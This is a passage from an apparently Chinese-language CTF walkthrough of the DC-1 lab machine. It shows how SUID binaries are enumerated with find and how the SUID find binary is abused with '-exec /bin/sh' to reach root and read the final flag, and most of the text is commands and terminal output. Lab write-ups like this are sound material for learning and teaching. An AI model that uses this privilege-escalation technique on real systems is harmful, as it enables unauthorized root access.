flag4@DC-1:~$ cat flag4.txt 
Can you use this same method to find or access the flag in root?

Probably. But perhaps it's not that easy.  Or maybe it is?
flag4@DC-1:~$ 

根据提示，你能用相同方法找到root的吗？或许很难，但也不一定

尝试cd到root用户下，结果失败，接下来提权

flag4@DC-1:~$ cd /root/
-bash: cd: /root/: Permission denied
flag4@DC-1:~$ 

0x10.提权

查看系统命令当中是否有SUID标识。

SUID标识为在命令执行时将短暂获得root权限，通过具有SUID标识的命令运行bash，这时bash就有root权限。

root信任SUID，SUID信任bash，bash就有了root权限

find / -perm -4000 2>/dev/null   // 查看具有SUID的命令

flag4@DC-1:~$ find / -perm -4000 2>/dev/null
/bin/mount
/bin/ping
/bin/su
/bin/ping6
/bin/umount
/usr/bin/at
/usr/bin/chsh
/usr/bin/passwd
/usr/bin/newgrp
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/procmail
/usr/bin/find
/usr/sbin/exim4
/usr/lib/pt_chown
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/sbin/mount.nfs
flag4@DC-1:~$ 

发现find就可以

下面进行利用

flag4@DC-1:~$ find /root -exec "whoami" \; 
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
root
flag4@DC-1:~$ 

可以发现为root

提权

flag4@DC-1:~$ find /root -exec "/bin/bash" \;      
bash-4.2$ id
uid=1001(flag4) gid=1001(flag4) groups=1001(flag4)
bash-4.2$ 

e翻车了！再换个方法

bash-4.2$ find /root -exec "/bin/sh" \;    
# id
uid=1001(flag4) gid=1001(flag4) euid=0(root) groups=0(root),1001(flag4)
# 

成功了😭

# pwd
/home/flag4
# cd /root
# ls
thefinalflag.txt
# cat thefinalflag.txt
Well done!!!!

Hopefully you've enjoyed this and learned some new skills.

You can let me know what you thought of this little journey
by contacting me via Twitter - @DCAU7
# 

0x11.接下来就是擦屁股走人了，干不动了。。。